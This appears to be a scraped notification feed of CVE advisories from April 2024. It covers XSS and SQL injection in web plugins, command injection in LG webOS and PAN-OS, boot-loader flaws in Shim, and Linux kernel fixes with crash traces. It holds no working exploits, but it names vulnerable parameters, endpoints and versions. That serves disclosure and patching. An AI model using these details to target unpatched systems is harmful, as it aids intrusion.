🚨 CVE-2024-32563Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VikBooking Hotel Booking Engine & PMS allows Reflected XSS.This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through 1.6.7.🎖@cveNotify |
|
| 2024-04-18 10:37:32 |
🚨 CVE-2024-32561Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tagembed allows Stored XSS.This issue affects Tagembed: from n/a through 4.7.🎖@cveNotify |
|
| 2024-04-18 10:37:31 |
🚨 CVE-2024-32559Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hwk-fr WP 404 Auto Redirect to Similar Post allows Reflected XSS.This issue affects WP 404 Auto Redirect to Similar Post: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-04-18 10:37:30 |
🚨 CVE-2024-32558Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in impleCode eCommerce Product Catalog allows Reflected XSS.This issue affects eCommerce Product Catalog: from n/a through 3.3.32.🎖@cveNotify |
|
| 2024-04-18 10:37:27 |
🚨 CVE-2024-32556Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nabil Lemsieh HurryTimer allows Stored XSS.This issue affects HurryTimer: from n/a through 2.9.2.🎖@cveNotify |
|
| 2024-04-18 10:37:26 |
🚨 CVE-2024-2833The Jobs for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘job-search’ parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-18 10:37:25 |
🚨 CVE-2024-29003The SolarWinds Platform was susceptible to a XSS vulnerability that affects the maps section of the user interface. This vulnerability requires authentication and requires user interaction.🎖@cveNotify |
|
| 2024-04-18 10:37:24 |
🚨 CVE-2024-26921In the Linux kernel, the following vulnerability has been resolved:inet: inet_defrag: prevent sk release while still in useip_local_out() and other functions can pass skb->sk as function argument.If the skb is a fragment and reassembly happens before such function callreturns, the sk must not be released.This affects skb fragments reassembled via netfilter or similarmodules, e.g. openvswitch or ct_act.c, when run as part of tx pipeline.Eric Dumazet made an initial analysis of this bug. Quoting Eric: Calling ip_defrag() in output path is also implying skb_orphan(), which is buggy because output path relies on sk not disappearing. A relevant old patch about the issue was : 8282f27449bf ("inet: frag: Always orphan skbs inside ip_defrag()") [..] net/ipv4/ip_output.c depends on skb->sk being set, and probably to an inet socket, not an arbitrary one. If we orphan the packet in ipvlan, then downstream things like FQ packet scheduler will not work properly. We need to change ip_defrag() to only use skb_orphan() when really needed, ie whenever frag_list is going to be used.Eric suggested to stash sk in fragment queue and made an initial patch.However there is a problem with this:If skb is refragmented again right after, ip_do_fragment() will copyhead->sk to the new fragments, and sets up destructor to sock_wfree.IOW, we have no choice but to fix up sk_wmem accouting to reflect thefully reassembled skb, else wmem will underflow.This change moves the orphan down into the core, to last possible moment.As ip_defrag_offset is aliased with sk_buff->sk member, we must move theoffset into the FRAG_CB, else skb->sk gets clobbered.This allows to delay the orphaning long enough to learn if the skb hasto be queued or if the skb is completing the reasm queue.In the former case, things work as before, skb is orphaned. This issafe because skb gets queued/stolen and won't continue past reasm engine.In the latter case, we will steal the skb->sk reference, reattach it tothe head skb, and fix up wmem accouting when inet_frag inflates truesize.🎖@cveNotify |
|
| 2024-04-18 09:37:43 |
🚨 CVE-2024-32601Missing Authorization vulnerability in WP OnlineSupport, Essential Plugin Popup Anything.This issue affects Popup Anything: from n/a through 2.8.🎖@cveNotify |
|
| 2024-04-18 09:37:42 |
🚨 CVE-2024-32599Improper Control of Generation of Code ('Code Injection') vulnerability in Deepak anand WP Dummy Content Generator.This issue affects WP Dummy Content Generator: from n/a through 3.2.1.🎖@cveNotify |
|
| 2024-04-18 09:37:38 |
🚨 CVE-2024-32598Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Booking Algorithms BA Book Everything allows Stored XSS.This issue affects BA Book Everything: from n/a through 1.6.8.🎖@cveNotify |
|
| 2024-04-18 09:37:37 |
🚨 CVE-2024-32595Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mat Bao Corp WP Helper Premium allows Reflected XSS.This issue affects WP Helper Premium: from n/a before 4.6.0.🎖@cveNotify |
|
| 2024-04-18 09:37:36 |
🚨 CVE-2024-32594Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AttesaWP Attesa Extra allows Stored XSS.This issue affects Attesa Extra: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-04-18 09:37:32 |
🚨 CVE-2024-32593Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS.This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.3.4.2.🎖@cveNotify |
|
| 2024-04-18 09:37:31 |
🚨 CVE-2024-32590Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webfood Kattene allows Stored XSS.This issue affects Kattene: from n/a through 1.7.🎖@cveNotify |
|
| 2024-04-18 09:37:30 |
🚨 CVE-2024-32588Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress Export Import allows Reflected XSS.This issue affects LearnPress Export Import: from n/a through 4.0.3.🎖@cveNotify |
|
| 2024-04-18 09:37:26 |
🚨 CVE-2024-29001A SolarWinds Platform SWQL Injection Vulnerability was identified in the user interface. This vulnerability requires authentication and user interaction to be exploited.🎖@cveNotify |
|
| 2024-04-18 09:37:25 |
🚨 CVE-2023-41864Cross-Site Request Forgery (CSRF) vulnerability in Pepro Dev. Group PeproDev CF7 Database.This issue affects PeproDev CF7 Database: from n/a through 1.8.0.🎖@cveNotify |
|
| 2024-04-18 09:37:24 |
🚨 CVE-2023-51391A bug in Micrium OS Network HTTP Server permits an invalid pointer dereference during header processing - potentially allowing a device crash and Denial of Service.🎖@cveNotify |
|
| 2024-04-18 08:37:30 |
🚨 CVE-2023-49742Missing Authorization vulnerability in Support Genix.This issue affects Support Genix: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-04-18 08:37:26 |
🚨 CVE-2023-6320A command injection vulnerability exists in the com.webos.service.connectionmanager/tv/setVlanStaticAddress endpoint on webOS versions 5 and 6. A series of specially crafted requests can lead to command execution as the dbus user. An attacker can make authenticated requests to trigger this vulnerability.Full versions and TV models affected: * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB🎖@cveNotify |
|
| 2024-04-18 08:37:25 |
🚨 CVE-2023-6318A command injection vulnerability exists in the processAnalyticsReport method from the com.webos.service.cloudupload service on webOS version 5 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.Full versions and TV models affected: * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA🎖@cveNotify |
|
| 2024-04-18 08:37:24 |
🚨 CVE-2023-6317A prompt bypass exists in the secondscreen.gateway service running on webOS version 4 through 7. An attacker can create a privileged account without asking the user for the security PIN. Full versions and TV models affected:webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA webOS 5.5.0 - 04.50.51 running on OLED55CXPUA webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA🎖@cveNotify |
|
| 2024-04-18 06:37:24 |
🚨 CVE-2021-20599Cleartext Transmission of Sensitive InformationCleartext transmission of sensitive information vulnerability in MELSEC iQ-R series Safety CPU R08/16/32/120SFCPU firmware versions "26" and prior and MELSEC iQ-R series SIL2 Process CPU R08/16/32/120PSFCPU firmware versions "11" and prior allows a remote unauthenticated attacker to login to a target CPU module by obtaining credentials other than password.🎖@cveNotify |
|
| 2024-04-18 05:37:32 |
🚨 CVE-2024-1429The Element Pack Elementor Addons (Header Footer, Free Template Library, Grid, Carousel, Table, Parallax Animation, Register Form, Twitter Grid) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘tab_link’ attribute of the Panel Slider widget in all versions up to, and including, 5.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-18 05:37:25 |
🚨 CVE-2024-28835A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the "certtool --verify-chain" command.🎖@cveNotify |
|
| 2024-04-18 05:37:24 |
🚨 CVE-2023-40550An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-18 04:37:29 |
🚨 CVE-2023-6240A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.🎖@cveNotify |
|
| 2024-04-18 04:37:26 |
🚨 CVE-2023-40549An out-of-bounds read flaw was found in Shim due to the lack of proper boundary verification during the load of a PE binary. This flaw allows an attacker to load a crafted PE binary, triggering the issue and crashing Shim, resulting in a denial of service.🎖@cveNotify |
|
| 2024-04-18 04:37:25 |
🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-04-18 04:37:24 |
🚨 CVE-2022-38710IBM Robotic Process Automation 21.0.1 and 21.0.2 could disclose sensitive version information that could aid in further attacks against the system. IBM X-Force ID: 234292.🎖@cveNotify |
|
| 2024-04-18 02:37:26 |
🚨 CVE-2024-29956A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a prints the Brocade SANnav password in clear text in supportsave logs when a user schedules a switch Supportsave from Brocade SANnav.🎖@cveNotify |
|
| 2024-04-18 02:37:25 |
🚨 CVE-2024-2947A flaw was found in Cockpit. Deleting a sosreport with a crafted name via the Cockpit web interface can lead to a command injection vulnerability, resulting in privilege escalation. This issue affects Cockpit versions 270 and newer.🎖@cveNotify |
|
| 2024-04-18 02:37:24 |
🚨 CVE-2024-24680An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.🎖@cveNotify |
|
| 2024-04-18 01:07:25 |
🚨 CVE-2024-3400A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-04-18 00:37:26 |
🚨 CVE-2024-3932A vulnerability classified as problematic has been found in Totara LMS 18.0.1 Build 20231128.01. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261369 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-18 00:37:25 |
🚨 CVE-2024-3928A vulnerability was found in Dromara open-capacity-platform 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /actuator/heapdump of the component auth-server. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261367.🎖@cveNotify |
|
| 2024-04-18 00:37:24 |
🚨 CVE-2023-4509It is possible for an API key to be logged in clear text in the audit log file after an invalid login attempt.🎖@cveNotify |
|
| 2024-04-17 23:37:28 |
🚨 CVE-2023-4235A flaw was found in ofono, an Open Source Telephony on Linux. A stack overflow bug is triggered within the decode_deliver_report() function during the SMS decoding. It is assumed that the attack scenario is accessible from a compromised modem, a malicious base station, or just SMS. There is a bound check for this memcpy length in decode_submit(), but it was forgotten in decode_deliver_report().🎖@cveNotify |
|
| 2024-04-17 23:37:27 |
🚨 CVE-2023-4233A flaw was found in ofono, an Open Source Telephony on Linux. A stack overflow bug is triggered within the sms_decode_address_field() function during the SMS PDU decoding. It is assumed that the attack scenario is accessible from a compromised modem, a malicious base station, or just SMS.🎖@cveNotify |
|
| 2024-04-17 23:37:26 |
🚨 CVE-2023-4232A flaw was found in ofono, an Open Source Telephony on Linux. A stack overflow bug is triggered within the decode_status_report() function during the SMS decoding. It is assumed that the attack scenario is accessible from a compromised modem, a malicious base station, or just SMS. There is a bound check for this memcpy length in decode_submit(), but it was forgotten in decode_status_report().🎖@cveNotify |
|
| 2024-04-17 22:37:26 |
🚨 CVE-2024-29952A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a could allow an authenticated user to print the Auth, Priv, and SSL key store passwords in unencrypted logs by manipulating command variables.🎖@cveNotify |
|
| 2024-04-17 21:37:35 |
🚨 CVE-2024-32745A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the PAGE DESCRIPTION parameter under the CURRENT PAGE module.🎖@cveNotify |
|
| 2024-04-17 21:37:34 |
🚨 CVE-2024-32744A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the PAGE KEYWORDS parameter under the CURRENT PAGE module.🎖@cveNotify |
|
| 2024-04-17 21:37:31 |
🚨 CVE-2024-32743A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the SITE LANGUAGE CONFIG parameter under the Security module.🎖@cveNotify |
|
| 2024-04-17 21:37:30 |
🚨 CVE-2024-32343A cross-site scripting (XSS) vulnerability in the Create Page of Boid CMS v2.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Content parameter.🎖@cveNotify |
|
| 2024-04-17 21:37:29 |
🚨 CVE-2024-32342A cross-site scripting (XSS) vulnerability in the Create Page of Boid CMS v2.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Permalink parameter.🎖@cveNotify |
|
| 2024-04-17 21:37:26 |
🚨 CVE-2024-32341Multiple cross-site scripting (XSS) vulnerabilities in the Home page of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into any of the parameters.🎖@cveNotify |
|
| 2024-04-17 21:37:25 |
🚨 CVE-2024-32338A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the PAGE TITLE parameter under the Current Page module.🎖@cveNotify |
|
| 2024-04-17 21:37:24 |
🚨 CVE-2024-32337A cross-site scripting (XSS) vulnerability in the Settings section of WonderCMS v3.4.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ADMIN LOGIN URL parameter under the Security module.🎖@cveNotify |
|
| 2024-04-17 20:37:41 |
🚨 CVE-2024-30951FUDforum v3.1.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the chpos parameter at /adm/admsmiley.php.🎖@cveNotify |
|
| 2024-04-17 20:37:40 |
🚨 CVE-2024-30983SQL Injection vulnerability in phpgurukul Cyber Cafe Management System Using PHP & MySQL 1.0 allows attackers to run arbitrary SQL commands via the compname parameter in /edit-computer-detail.php file.🎖@cveNotify |
|
| 2024-04-17 20:37:36 |
🚨 CVE-2024-30980SQL Injection vulnerability in phpgurukul Cyber Cafe Management System Using PHP & MySQL 1.0 allows attackers to run arbitrary SQL commands via the Computer Location parameter in manage-computer.php page.🎖@cveNotify |
|
| 2024-04-17 20:37:35 |
🚨 CVE-2023-5406Server communication with a controller can lead to remote code execution using a specially crafted message from the controller. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 20:37:31 |
🚨 CVE-2023-5404Server receiving a malformed message can cause a pointer to be overwritten which can result in a remote code execution or failure. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 20:37:30 |
🚨 CVE-2023-5400Server receiving a malformed message based on a using the specified key values can cause a heap overflow vulnerability which could lead to an attacker performing remote code execution or causing a failure. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 20:37:26 |
🚨 CVE-2023-5397Server receiving a malformed message to create a new connection could lead to an attacker performing remote code execution or causing a failure. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 20:37:25 |
🚨 CVE-2023-5395Server receiving a malformed message that uses the hostname in an internal table may cause a stack overflow resulting in possible remote code execution. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-17 20:37:24 |
🚨 CVE-2024-2700A vulnerability was found in the quarkus-core component. Quarkus captures local environment variables from the Quarkus namespace during the application's build, therefore, running the resulting application inherits the values captured at build time. Some local environment variables may have been set by the developer or CI environment for testing purposes, such as dropping the database during application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application, which can lead to dangerous behavior if the application does not override these values. This behavior only happens for configuration properties from the `quarkus.*` namespace. Application-specific properties are not captured.🎖@cveNotify |
|
| 2024-04-17 20:07:26 |
🚨 CVE-2024-26596In the Linux kernel, the following vulnerability has been resolved:net: dsa: fix netdev_priv() dereference before check on non-DSA netdevice eventsAfter the blamed commit, we started doing this dereference for everyNETDEV_CHANGEUPPER and NETDEV_PRECHANGEUPPER event in the system.static inline struct dsa_port *dsa_user_to_port(const struct net_device *dev){ struct dsa_user_priv *p = netdev_priv(dev); return p->dp;}Which is obviously bogus, because not all net_devices have a netdev_priv()of type struct dsa_user_priv. But struct dsa_user_priv is fairly small,and p->dp means dereferencing 8 bytes starting with offset 16. Mostdrivers allocate that much private memory anyway, making our access notfault, and we discard the bogus data quickly afterwards, so this wasn'tcaught.But the dummy interface is somewhat special in that it callsalloc_netdev() with a priv size of 0. So every netdev_priv() dereferenceis invalid, and we get this when we emit a NETDEV_PRECHANGEUPPER eventwith a VLAN as its new upper:$ ip link add dummy1 type dummy$ ip link add link dummy1 name dummy1.100 type vlan id 100[ 43.309174] ==================================================================[ 43.316456] BUG: KASAN: slab-out-of-bounds in dsa_user_prechangeupper+0x30/0xe8[ 43.323835] Read of size 8 at addr ffff3f86481d2990 by task ip/374[ 43.330058][ 43.342436] Call trace:[ 43.366542] dsa_user_prechangeupper+0x30/0xe8[ 43.371024] dsa_user_netdevice_event+0xb38/0xee8[ 43.375768] notifier_call_chain+0xa4/0x210[ 43.379985] raw_notifier_call_chain+0x24/0x38[ 43.384464] __netdev_upper_dev_link+0x3ec/0x5d8[ 43.389120] netdev_upper_dev_link+0x70/0xa8[ 43.393424] register_vlan_dev+0x1bc/0x310[ 43.397554] vlan_newlink+0x210/0x248[ 43.401247] rtnl_newlink+0x9fc/0xe30[ 43.404942] rtnetlink_rcv_msg+0x378/0x580Avoid the kernel oops by dereferencing after the type check, as customary.🎖@cveNotify |
|
| 2024-04-17 20:07:25 |
🚨 CVE-2023-52463In the Linux kernel, the following vulnerability has been resolved:efivarfs: force RO when remounting if SetVariable is not supportedIf SetVariable at runtime is not supported by the firmware we never assigna callback for that function. At the same time mount the efivarfs asRO so no one can call that. However, we never check the permission flagswhen someone remounts the filesystem as RW. As a result this leads to acrash looking like this:$ mount -o remount,rw /sys/firmware/efi/efivars$ efi-updatevar -f PK.auth PK[ 303.279166] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000[ 303.280482] Mem abort info:[ 303.280854] ESR = 0x0000000086000004[ 303.281338] EC = 0x21: IABT (current EL), IL = 32 bits[ 303.282016] SET = 0, FnV = 0[ 303.282414] EA = 0, S1PTW = 0[ 303.282821] FSC = 0x04: level 0 translation fault[ 303.283771] user pgtable: 4k pages, 48-bit VAs, pgdp=000000004258c000[ 303.284913] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000[ 303.286076] Internal error: Oops: 0000000086000004 [#1] PREEMPT SMP[ 303.286936] Modules linked in: qrtr tpm_tis tpm_tis_core crct10dif_ce arm_smccc_trng rng_core drm fuse ip_tables x_tables ipv6[ 303.288586] CPU: 1 PID: 755 Comm: efi-updatevar Not tainted 6.3.0-rc1-00108-gc7d0c4695c68 #1[ 303.289748] Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.04-00627-g88336918701d 04/01/2023[ 303.291150] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)[ 303.292123] pc : 0x0[ 303.292443] lr : efivar_set_variable_locked+0x74/0xec[ 303.293156] sp : ffff800008673c10[ 303.293619] x29: ffff800008673c10 x28: ffff0000037e8000 x27: 0000000000000000[ 303.294592] x26: 0000000000000800 x25: ffff000002467400 x24: 0000000000000027[ 303.295572] x23: ffffd49ea9832000 x22: ffff0000020c9800 x21: ffff000002467000[ 303.296566] x20: 0000000000000001 x19: 00000000000007fc x18: 0000000000000000[ 303.297531] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaaac807ab54[ 303.298495] x14: ed37489f673633c0 x13: 71c45c606de13f80 x12: 47464259e219acf4[ 303.299453] x11: ffff000002af7b01 x10: 0000000000000003 x9 : 0000000000000002[ 303.300431] x8 : 0000000000000010 x7 : ffffd49ea8973230 x6 : 0000000000a85201[ 303.301412] x5 : 0000000000000000 x4 : ffff0000020c9800 x3 : 00000000000007fc[ 303.302370] x2 : 0000000000000027 x1 : ffff000002467400 x0 : ffff000002467000[ 303.303341] Call trace:[ 303.303679] 0x0[ 303.303938] efivar_entry_set_get_size+0x98/0x16c[ 303.304585] efivarfs_file_write+0xd0/0x1a4[ 303.305148] vfs_write+0xc4/0x2e4[ 303.305601] ksys_write+0x70/0x104[ 303.306073] __arm64_sys_write+0x1c/0x28[ 303.306622] invoke_syscall+0x48/0x114[ 303.307156] el0_svc_common.constprop.0+0x44/0xec[ 303.307803] do_el0_svc+0x38/0x98[ 303.308268] el0_svc+0x2c/0x84[ 303.308702] el0t_64_sync_handler+0xf4/0x120[ 303.309293] el0t_64_sync+0x190/0x194[ 303.309794] Code: ???????? ???????? ???????? ???????? (????????)[ 303.310612] ---[ end trace 0000000000000000 ]---Fix this by adding a .reconfigure() function to the fs operations whichwe can use to check the requested flags and deny anything that's not ROif the firmware doesn't implement SetVariable at runtime.🎖@cveNotify |
|
| 2024-04-17 20:07:24 |
🚨 CVE-2023-52462In the Linux kernel, the following vulnerability has been resolved:bpf: fix check for attempt to corrupt spilled pointerWhen register is spilled onto a stack as a 1/2/4-byte register, we setslot_type[BPF_REG_SIZE - 1] (plus potentially few more below it,depending on actual spill size). So to check if some stack slot hasspilled register we need to consult slot_type[7], not slot_type[0].To avoid the need to remember and double-check this in the future, justuse is_spilled_reg() helper.🎖@cveNotify |
|
| 2024-04-17 19:37:43 |
🚨 CVE-2024-32162CMSeasy 7.7.7.9 is vulnerable to Arbitrary file deletion.🎖@cveNotify |
|
| 2024-04-17 19:37:42 |
🚨 CVE-2024-31583Pytorch before version v2.2.0 was discovered to contain a use-after-free vulnerability in torch/csrc/jit/mobile/interpreter.cpp.🎖@cveNotify |
|
| 2024-04-17 19:37:41 |
🚨 CVE-2024-31581FFmpeg version n6.1 was discovered to contain an improper validation of array index vulnerability in libavcodec/cbs_h266_syntax_template.c. This vulnerability allows attackers to cause undefined behavior within the application.🎖@cveNotify |
|
| 2024-04-17 19:37:36 |
🚨 CVE-2024-31041Null Pointer Dereference vulnerability in topic_filtern function in mqtt_parser.c in NanoMQ 0.21.7 allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2024-04-17 19:37:35 |
🚨 CVE-2024-30990SQL Injection vulnerability in the "Invoices" page in phpgurukul Client Management System using PHP & MySQL 1.1 allows attacker to execute arbitrary SQL commands via "searchdata" parameter.🎖@cveNotify |
|
| 2024-04-17 19:37:31 |
🚨 CVE-2024-30953A stored cross-site scripting (XSS) vulnerability in Htmly v2.9.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link Name parameter of Menu Editor module.🎖@cveNotify |
|
| 2024-04-17 19:37:30 |
🚨 CVE-2023-52467In the Linux kernel, the following vulnerability has been resolved:mfd: syscon: Fix null pointer dereference in of_syscon_register()kasprintf() returns a pointer to dynamically allocated memorywhich can be NULL upon failure.🎖@cveNotify |
|
| 2024-04-17 19:07:26 |
🚨 CVE-2023-52472In the Linux kernel, the following vulnerability has been resolved:crypto: rsa - add a check for allocation failureStatic checkers insist that the mpi_alloc() allocation can fail so adda check to prevent a NULL dereference. Small allocations like thiscan't actually fail in current kernels, but adding a check is verysimple and makes the static checkers happy.🎖@cveNotify |
|
| 2024-04-17 19:07:25 |
🚨 CVE-2023-52469In the Linux kernel, the following vulnerability has been resolved:drivers/amd/pm: fix a use-after-free in kv_parse_power_tableWhen ps allocated by kzalloc equals to NULL, kv_parse_power_tablefrees adev->pm.dpm.ps that allocated before. However, after the controlflow goes through the following call chains:kv_parse_power_table |-> kv_dpm_init |-> kv_dpm_sw_init |-> kv_dpm_finiThe adev->pm.dpm.ps is used in the for loop of kv_dpm_fini after itsfirst free in kv_parse_power_table and causes a use-after-free bug.🎖@cveNotify |
|
| 2024-04-17 19:07:24 |
🚨 CVE-2023-52468In the Linux kernel, the following vulnerability has been resolved:class: fix use-after-free in class_register()The lock_class_key is still registered and can be found inlock_keys_hash hlist after subsys_private is freed in errorhandler path.A task who iterate over the lock_keys_hashlater may cause use-after-free.So fix that up and unregisterthe lock_class_key before kfree(cp).On our platform, a driver fails to kset_register because ofcreating duplicate filename '/class/xxx'.With Kasan enabled,it prints a invalid-access bug report.KASAN bug report:BUG: KASAN: invalid-access in lockdep_register_key+0x19c/0x1bcWrite of size 8 at addr 15ffff808b8c0368 by task modprobe/252Pointer tag: [15], memory tag: [fe]CPU: 7 PID: 252 Comm: modprobe Tainted: G W 6.6.0-mainline-maybe-dirty #1Call trace:dump_backtrace+0x1b0/0x1e4show_stack+0x2c/0x40dump_stack_lvl+0xac/0xe0print_report+0x18c/0x4d8kasan_report+0xe8/0x148__hwasan_store8_noabort+0x88/0x98lockdep_register_key+0x19c/0x1bcclass_register+0x94/0x1ecinit_module+0xbc/0xf48 [rfkill]do_one_initcall+0x17c/0x72cdo_init_module+0x19c/0x3f8...Memory state around the buggy address:ffffff808b8c0100: 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8a 8affffff808b8c0200: 8a 8a 8a 8a 8a 8a 8a 8a fe fe fe fe fe fe fe fe>ffffff808b8c0300: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe ^ffffff808b8c0400: 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03As CONFIG_KASAN_GENERIC is not set, Kasan reports invalid-accessnot use-after-free here.In this case, modprobe is manipulatingthe corrupted lock_keys_hash hlish where lock_class_key is alreadyfreed before.It's worth noting that this only can happen if lockdep is enabled,which is not true for normal system.🎖@cveNotify |
|
| 2024-04-17 18:37:32 |
🚨 CVE-2024-30982SQL Injection vulnerability in phpgurukul Cyber Cafe Management System Using PHP & MySQL 1.0 allows attackers to run arbitrary SQL commands via the upid parameter in the /view-user-detail.php file.🎖@cveNotify |
|
| 2024-04-17 18:37:26 |
🚨 CVE-2024-30951FUDforum v3.1.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the chpos parameter at /adm/admsmiley.php.🎖@cveNotify |
|
| 2024-04-17 18:37:25 |
🚨 CVE-2023-52473In the Linux kernel, the following vulnerability has been resolved:thermal: core: Fix NULL pointer dereference in zone registration error pathIf device_register() in thermal_zone_device_register_with_trips()returns an error, the tz variable is set to NULL and subsequentlydereferenced in kfree(tz->tzp).Commit adc8749b150c ("thermal/drivers/core: Use put_device() ifdevice_register() fails") added the tz = NULL assignment in question toavoid a possible double-free after dropping the reference to the zonedevice. However, after commit 4649620d9404 ("thermal: core: Makethermal_zone_device_unregister() return after freeing the zone"), thatassignment has become redundant, because dropping the reference to thezone device does not cause the zone object to be freed any more.Drop it to address the NULL pointer dereference.🎖@cveNotify |
|
| 2024-04-17 18:37:24 |
🚨 CVE-2023-1386A flaw was found in the 9p passthrough filesystem (9pfs) implementation in QEMU. When a local user in the guest writes an executable file with SUID or SGID, none of these privileged bits are correctly dropped. As a result, in rare circumstances, this flaw could be used by malicious users in the guest to elevate their privileges within the guest and help a host local user to elevate privileges on the host.🎖@cveNotify |
|
| 2024-04-17 18:07:30 |
🚨 CVE-2019-25160In the Linux kernel, the following vulnerability has been resolved:netlabel: fix out-of-bounds memory accessesThere are two array out-of-bounds memory accesses, one incipso_v4_map_lvl_valid(), the other in netlbl_bitmap_walk(). Botherrors are embarassingly simple, and the fixes are straightforward.As a FYI for anyone backporting this patch to kernels prior to v4.8,you'll want to apply the netlbl_bitmap_walk() patch tocipso_v4_bitmap_walk() as netlbl_bitmap_walk() doesn't exist beforeLinux v4.8.🎖@cveNotify |
|
| 2024-04-17 18:07:29 |
